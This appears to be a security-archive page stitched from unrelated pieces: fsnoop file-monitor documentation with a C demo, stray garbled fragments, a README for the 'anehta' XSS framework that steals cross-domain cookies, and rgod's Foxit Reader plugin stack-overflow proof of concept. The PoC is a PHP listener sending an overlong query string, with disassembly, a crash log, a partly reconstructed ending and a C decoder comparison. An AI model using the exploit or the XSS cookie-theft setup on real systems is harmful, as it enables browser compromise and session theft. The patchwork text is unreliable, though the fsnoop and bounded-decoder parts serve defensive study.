Very easy, you only need one WPA handshake
$ ./fsnoop --help
fsnoop monitors file operations by using the Inotify mechanism.

Usage: fsnoop [OPTIONS] [DIR1[,DIR2,...]] [-- COMMAND]

  -d            Run as a daemon
  -fd           Open file descriptors when it's possible
  -k            Send SIGSTOP signal to the running process (COMMAND)
  -o filename   Output is redirected to a specific file
  -r            Monitor directory contents recursively
  -t            Prefix each line with the time of day

If no DIR is specified, default writable directories such as /tmp, /var/tmp, /dev/shm, etc. are monitored. If COMMAND is specified, it will monitor activities during the process duration.
An event begins with an action character (placed between brackets), followed by the file's mode, owner, size, timestamp and path:

  [C] -rw------- 1 root root    0 Tue May  8 22:17:10 2012 /var/tmp/test
  [M] -rw-r--r-- 1 root root    0 Tue May  8 22:17:10 2012 /var/tmp/test
  [U] -rw-r--r-- 1 root root 1741 Tue May  8 22:17:27 2012 /var/tmp/test
  [M] -rwxrwxrwx 1 root root 1741 Tue May  8 22:17:27 2012 /var/tmp/test
  [D] F /var/tmp/test

Read top to bottom, the sample shows the file being created ([C], mode 0600), its permissions changed ([M], to 0644), content written ([U], now 1741 bytes), made world-writable ([M], 0777) and finally deleted ([D]; the F marks a regular file).
To monitor the /etc and /tmp directories:

  # ./fsnoop /etc,/tmp
  Starting fsnoop version 2.0
  [+] monitor /etc
  [+] monitor /tmp

To run fsnoop as a daemon in order to monitor the "/var/tmp" directory and record activities in the "/root/fsnoop.log" file:
  # ./fsnoop -d -t -o /root/fsnoop.log /var/tmp
  Starting fsnoop version 2.0

The output log will look like this:
  # cat /root/fsnoop.log
  [+] monitor /var/tmp
  (20:10:00) [C] -rw-r--r-- 1 root root 0 Mon Jul 9 20:10:00 2012 /var/tmp/blurb-lock
  (20:10:00) [M] -rw-r--r-- 1 root root 0 Mon Jul 9 20:10:00 2012 /var/tmp/blurb-lock
  (20:13:02) [D] F /var/tmp/blurb-lock

To monitor file activities only for the duration of a process:
  $ ./fsnoop /tmp -- Xorg -ac :1
  Starting fsnoop version 2.0
  [+] monitor /tmp

To send the SIGSTOP signal to the process right after an event occurs:
  $ ./fsnoop -k /tmp/.tX1-lock -- Xorg -ac :1
  [...]
  [C] F /tmp/.tX0-lock
  *** PID 30342 stopped, type [Enter] to resume execution:
  *** PID 30342 resumed
  ...

To read the content of a file that has been erased:
  $ ./fsnoop -fd /var/tmp
  [+] monitor /var/tmp
  [+] As the "-fd" option is being used, you can launch a new shell by using "ctrl-c" and disclose file descriptors content.
  [C] -rw-r--r-- 1 root root 0 Tue Jan 1 21:39:55 2013 /var/tmp/temp.2oPahVp (opened fd=5)
  [U] -rw-r--r-- 1 root root 13 Tue Jan 1 21:40:37 2013 /var/tmp/temp.2oPahVp
  [D] F /var/tmp/temp.2oPahVp
  ^C
  Here are opened file descriptors. You can display their contents by using the "cat" command. For example, to display fd #4 use: "cat <&4"
  lrwx------ 1 vladz vladz 64 1 janv. 21:43 0 -> /dev/pts/3
  lr-x------ 1 vladz vladz 64 1 janv. 21:43 5 -> /var/tmp/temp.2oPahVp (deleted)
  fsnoop$ cat <&5

The descriptor opened at creation time keeps the inode alive, so the file is still readable from the fsnoop shell after the [D] event even though the directory entry is gone. To monitor directories recursively:
  $ mkdir -p /tmp/a/b/c/d/e/f
  $ touch /tmp/a/b/c/d/e/f/a

The event will be caught:
  $ ./fsnoop -r /tmp
  [+] monitor /tmp
  [C] -rw-r--r-- 1 vladz vladz 0 Thu Jan 24 13:10:30 2013 /tmp/a/b/c/d/e/f/a

Combined with -k and -fd, this is a practical way to spot insecure temporary-file handling: a file created with a predictable name and a readable mode in a world-writable directory is exposed to every local user between its [C] and its [D].
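The mechanism behind the transcripts above, as an added example that is not fsnoop's own code: an inotify watch on a directory, events printed with fsnoop's action letters, and the "-fd" trick of opening each newly created file immediately so its content can still be read after the owner unlinks it. The demo replays the temp-file scenario inside one process (create, write, delete, then read back through the captured descriptor); the directory under /tmp and the file name are made up for the demo, and it is Linux-only because it relies on inotify.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <limits.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/inotify.h>
#include <unistd.h>

/* Room for a burst of events carrying maximal-length names. */
#define EVBUF_SIZE (16 * (sizeof(struct inotify_event) + NAME_MAX + 1))

struct capture {
    int fd;                        /* descriptor held open on the new file, -1 if none */
    int created, updated, deleted;
};

/* Map an inotify mask onto the single-letter actions fsnoop prints. */
static char action_of(uint32_t mask)
{
    if (mask & IN_CREATE)                    return 'C';
    if (mask & IN_ATTRIB)                    return 'M';
    if (mask & (IN_MODIFY | IN_CLOSE_WRITE)) return 'U';
    if (mask & IN_DELETE)                    return 'D';
    return '?';
}

/* Drain every queued event from a non-blocking inotify descriptor.  On a
   create we open() the file at once and keep the descriptor: an open
   descriptor pins the inode, so the content stays readable after the owner
   unlinks it.  That is the trick behind "fsnoop -fd". Returns event count. */
int drain_events(int ifd, const char *dir, struct capture *cap)
{
    char buf[EVBUF_SIZE] __attribute__((aligned(8)));
    ssize_t len;
    int n = 0;

    while ((len = read(ifd, buf, sizeof buf)) > 0) {
        for (char *p = buf; p < buf + len; n++) {
            const struct inotify_event *ev = (const struct inotify_event *)p;
            char action = action_of(ev->mask), path[PATH_MAX];
            p += sizeof *ev + ev->len;
            if (ev->len == 0) continue;       /* event on the directory itself */
            snprintf(path, sizeof path, "%s/%s", dir, ev->name);
            printf("[%c] %s\n", action, path);
            if (action == 'C') {
                cap->created++;
                /* O_NOFOLLOW: a planted symlink must not redirect us */
                if (cap->fd < 0)
                    cap->fd = open(path, O_RDONLY | O_NOFOLLOW);
            } else if (action == 'U') {
                cap->updated++;
            } else if (action == 'D') {
                cap->deleted++;
            }
        }
    }
    return n;
}

/* Replay the transcript's scenario in one process: a temp file is created,
   written and erased while we watch, then read back through the descriptor
   grabbed at creation time.  Returns 0 on success with the recovered content
   in out.  Directory and file name are made up for the demo. */
int run_demo(char *out, size_t outlen, struct capture *cap)
{
    char dir[] = "/tmp/fsnoop-demo.XXXXXX", file[PATH_MAX];
    int ifd, wd, f;
    ssize_t got;

    *cap = (struct capture){ .fd = -1 };
    out[0] = '\0';
    if (mkdtemp(dir) == NULL) return -1;
    ifd = inotify_init1(IN_NONBLOCK | IN_CLOEXEC);
    if (ifd < 0) return -1;
    wd = inotify_add_watch(ifd, dir, IN_CREATE | IN_ATTRIB | IN_MODIFY |
                                     IN_CLOSE_WRITE | IN_DELETE);
    if (wd < 0) return -1;

    /* the "victim": predictable temp file, written, then erased */
    snprintf(file, sizeof file, "%s/temp.2oPahVp", dir);
    f = open(file, O_WRONLY | O_CREAT | O_EXCL, 0644);
    if (f < 0) return -1;
    drain_events(ifd, dir, cap);              /* [C]: our fd is grabbed here */
    if (write(f, "secret data\n", 12) != 12) return -1;
    close(f);
    drain_events(ifd, dir, cap);              /* [U] */
    unlink(file);
    drain_events(ifd, dir, cap);              /* [D]: the entry is gone... */

    if (cap->fd < 0) return -1;
    got = read(cap->fd, out, outlen - 1);     /* ...but the data is not */
    if (got < 0) return -1;
    out[got] = '\0';
    close(cap->fd);
    inotify_rm_watch(ifd, wd);
    close(ifd);
    rmdir(dir);
    return 0;
}

int main(void)
{
    struct capture cap;
    char out[64];
    if (run_demo(out, sizeof out, &cap) != 0) { perror("run_demo"); return 1; }
    printf("recovered after unlink: %s", out);
    return 0;
}
```

The events are drained between each step so the capture is deterministic; a real monitor does the same thing from a separate process and wins the race only if it opens the file before the victim unlinks it, which is exactly the window fsnoop's -k option is meant to widen.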
ip_addr
(or a regular function if we optimize constant away from runtime exec - see below about purity);(eth) ((ip) (...) or (arp) (...))
. in other words, the proto list should be a special form (binding current protos) rather than a fixed preamble.set?
predicates;

File:
Description:

=== Environment ===
1. PHP4/5 (PHP5 is recommended)
2. Apache or IIS

=== Install & Configure ===
1. Decompress all the files into a directory on your server.
2. Make sure the directory has write permission.
3. Modify $U (username) and $P (password) in the "server/class/auth_Class.php" file. The default username is "admin" and the default password is "123456". Change both before exposing the server: the admin panel is otherwise open to anyone who knows the defaults.
4. If you want to send mail, modify the "server/mail.php" file to use your own mail server or mailbox.

=== Quick Start ===
1. Log in and go to the Configure tab.
2. Enter "anehtaurl" as the URL where your anehta is. For example: "http://www.a.com/anehta".
3. You should also enter the boomerang src and boomerang target. boomerang src is usually the same page where you put your feed.js. For example, boomerang src may be: "http://www.b.com/xssed.html?param=". boomerang target must be the page from which you want to steal the cross-domain cookie. For example, boomerang target may be: "http://www.alimafia.com/xssDemo.html#'><'". You can modify feed.js to disable the xcookie module if you do not want to use boomerang, but you must always set the boomerang src and target values when you edit the Configure tab.
4. After modifying the configuration, simply load feed.js as an external script on your XSS page. There is also a demo page in the directory, "demo.html".
5. Refresh admin.php; you should see changes once your XSS slave comes in.

=== More Support ===
Home page: http://anehta.googlecode.com
Blog: http://hi.baidu.com/aullik5 (Many docs here)
Demo Video: http://hi.baidu.com/aullik5/blog/item/cb4cd5899283b093a4c272a9.html
Author: axis@ph4nt0m.org
Feel free to send me your advice.
SHA1 Checksum: 623853b2d834e696b4c264c22ef877ecfa588fbb
File:
Description: Not working bash script to test if I can upload files.
SHA1 Checksum: 0fe79f78dd385433edb70279306fc4974b9f0c77
<?php
/*
Foxit Reader <= 5.4.4.1128 Plugin for Firefox npFoxitReaderPlugin.dll
Overlong Query String Remote Stack Buffer Overflow PoC
rgod
-----------------------------
(listener)

Tested against Microsoft Windows
  Mozilla Firefox 17.0.1
  Foxit Reader 5.4.3.0920
  Foxit Reader 5.4.4.1128
File: npFoxitReaderPlugin.dll
Version: 2.2.1.530
Product url: http://www.foxitsoftware.com/downloads/
Latest version installation file: FoxitReader544.11281_enu_Setup.exe

Usage: launch from the command line, then browse with Firefox to port 6666.
You can also test it through a web site: http://192.168.0.1/x.pdf?[A x 1024]
The file must exist, or the server must respond with the proper Content-Type header.

Vulnerable code, npFoxitReaderPlugin.dll:

,------------------------------------------------------------------------------
L1000162F:
  push ebx
  push esi
  push edi
  mov edi, ebp
  or ecx, FFFFFFFFh
  xor eax, eax
  xor ebx, ebx
  xor esi, esi
  repne scasb
  not ecx
  dec ecx
  test ecx, ecx
  jle L100016E4
L1000164A:
  mov al, [esi+ebp]
  mov word ptr [esp+18h], 0000h
  cmp al, 25h
  jz L10001661
  mov ecx, [esp+1Ch]
  mov [ebx+ecx], al
  jmp L100016CE
L10001661:
  mov al, [esi+ebp+01h]
  cmp al, 30h
  jl L1000166D
  cmp al, 39h
  jle L1000167D
L1000166D:
  cmp al, 41h
  jl L10001675
  cmp al, 46h
  jle L1000167D
L10001675:
  cmp al, 61h
  jl L100016C6
  cmp al, 66h
  jg L100016C6
L1000167D:
  mov dl, [esi+ebp+01h]
  inc esi
  inc esi
  lea ecx, [esp+10h]
  mov [esp+18h], dl
  push ecx
  mov al, [esi+ebp]
  lea edx, [esp+1Ch]
  push L100450D4
  push edx
  mov [esp+25h], al
  call SUB_L10006421
  mov eax, [esp+1Ch]
  lea ecx, [esp+24h]
  push eax
  push L100450D0
  push ecx
  call SUB_L100063CF
  mov eax, [esp+34h]
  mov dl, [esp+30h]
  add esp, 00000018h
  mov [ebx+eax], dl
  jmp L100016CE
L100016C6:
  mov ecx, [esp+1Ch]
  mov byte ptr [ebx+ecx], 25h
L100016CE:
  inc ebx
  mov edi, ebp
  or ecx, FFFFFFFFh
  xor eax, eax
  inc esi
  repne scasb
  not ecx
  dec ecx
  cmp esi, ecx
  jl L1000164A
L100016E4:
  mov edx, [esp+1Ch]
  pop edi
  pop esi
  mov eax, 00000001h
  mov byte ptr [ebx+edx], 00h
  pop ebx
  pop ebp
  pop ecx
  retn
,------------------------------------------------------------------------------

This copy loop (a %XX decoder: each byte of the query string is stored at
[ebx+buffer] with ebx incremented and never compared against the buffer size)
ends up overwriting stack pointers; then, attached to plugin-container.exe:

(F48.1778): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000341 ebx=0076ed4c ecx=002cf414 edx=0076e9e8 esi=41414141 edi=002cf414
eip=10016852 esp=002cf3f8 ebp=75eacdf8 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
npFoxitReaderPlugin!NP_GetEntryPoints+0x15672:
10016852 8906            mov     dword ptr [esi],eax  ds:0023:41414141=????

... attempt to write to address 41414141 ...
SEH pointers are overwritten too.
*/
error_reporting(0);
set_time_limit(0);

$port = 6666;

// First answer: bounce the browser to the PDF URL carrying the overlong query string.
$____redirect = "HTTP/1.1 301 Moved Permanently\r\n" .
                "Server: Apache\r\n" .
                "Location: /x.pdf?" . str_repeat("A", 1024) . "\r\n" .
                "Content-Type: text/html\r\n\r\n";

// Second answer: headers that make Firefox hand the URL to the Foxit plugin.
// (The page's copy of this identifier was mangled; the name is ours.)
$____pdf = "HTTP/1.1 200 OK\r\n" .
           "Server: Apache\r\n" .
           "Accept-Ranges: bytes\r\n" .
           "Content-Length: 60137\r\n" .
           "Content-Type: application/pdf\r\n" .
           "Connection: keep-alive\r\n\r\n";

$socket = stream_socket_server("tcp://0.0.0.0:" . $port, $errno, $errstr);
if (!$socket) {
  echo "$errstr ($errno)\n";
} else {
  echo "Listening on public TCP port " . $port . "\n";
  while ($conn = stream_socket_accept($socket)) {
    $line = fgets($conn);
    echo $line;
    // The page's copy of the PoC is cut off at this point. What follows is a
    // reconstruction of the evident intent, not rgod's text: a request that is
    // not the padded /x.pdf gets the 301, the padded request gets the PDF
    // headers followed by Content-Length bytes of filler.
    if (strpos($line, "/x.pdf?") === false) {
      fwrite($conn, $____redirect);
    } else {
      fwrite($conn, $____pdf . str_repeat("\x00", 60137));
    }
    fclose($conn);
  }
}

Running it:

  D:\xampplite\htdocs>d:\xampplite\php\php.exe -f x.php
  Listening on public TCP port 6666
  GET /x.pdf?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[... 1024 x 'A', shortened here ...] HTTP/1.1

And finally, point the browser at the address and port:
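The bug the listing shows, written out in C as an added example (not rgod's code and not Foxit's): the decoder loop at L1000164A, which walks the query string, expands %XX where the byte after '%' passes the three hex-range checks, and stores every output byte at dst[ebx++] without ever knowing the size of dst, placed beside a bounded version that refuses input that would not fit. The 256-byte stack buffer in plugin_style_decode_on_stack is an assumed size; the real buffer size is not visible in the disassembly. build_poc_query produces the same 1024 x 'A' payload the PoC sends.

```c
#include <errno.h>
#include <stddef.h>
#include <string.h>

/* Value of a hex digit, or -1.  Same three range checks the listing makes on
   the byte after '%' (30h-39h, 41h-46h, 61h-66h). */
static int hexval(int c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    return -1;
}

/* Shape of the loop at L1000164A: walk src, expand %XX, store each byte at
   dst[o++] with no notion of how large dst is.  With a 1024-byte query and a
   stack buffer this is the crash shown above.  Never call it with input that
   is not known to fit dst. */
void percent_decode_unbounded(const char *src, char *dst)
{
    size_t i = 0, o = 0, n = strlen(src);
    while (i < n) {
        int hi, lo;
        if (src[i] == '%' && (hi = hexval(src[i + 1])) >= 0 &&
            (lo = hexval(src[i + 2])) >= 0) {
            dst[o++] = (char)(hi * 16 + lo);
            i += 3;
        } else {
            dst[o++] = src[i++];        /* '%' not followed by hex is kept */
        }
    }
    dst[o] = '\0';                      /* the "mov byte ptr [ebx+edx], 00h" */
}

/* Hardened form: never writes past dstlen bytes (terminator included).
   Returns the decoded length, or -1 with errno = ENOSPC when the decoded
   input would not fit; dst is then an empty string, not a partial one. */
int percent_decode_bounded(const char *src, char *dst, size_t dstlen)
{
    size_t i = 0, o = 0, n = strlen(src);
    if (dstlen == 0) { errno = EINVAL; return -1; }
    while (i < n) {
        int hi, lo;
        if (o + 1 >= dstlen) {          /* checked before the store, not after */
            dst[0] = '\0';
            errno = ENOSPC;
            return -1;
        }
        if (src[i] == '%' && (hi = hexval(src[i + 1])) >= 0 &&
            (lo = hexval(src[i + 2])) >= 0) {
            dst[o++] = (char)(hi * 16 + lo);
            i += 3;
        } else {
            dst[o++] = src[i++];
        }
    }
    dst[o] = '\0';
    return (int)o;
}

/* What the plugin effectively does: decode the query string of the URL it
   is handed into a fixed stack buffer.  256 is an assumed size. */
size_t plugin_style_decode_on_stack(const char *query)
{
    char local[256];
    percent_decode_unbounded(query, local);
    return strlen(local);
}

/* Build the PoC's query string, 1024 x 'A' (capped to the buffer).
   Returns the number of payload bytes written. */
size_t build_poc_query(char *buf, size_t buflen)
{
    size_t n = buflen > 1024 ? 1024 : buflen - 1;
    memset(buf, 'A', n);
    buf[n] = '\0';
    return n;
}
```

The fix is the placement of the check: the bounded decoder tests the remaining room before every store, so a '%XX' sequence can never become the byte that lands past the end. Resizing the buffer alone would not help; a query string is attacker-controlled and can be made longer than any fixed size.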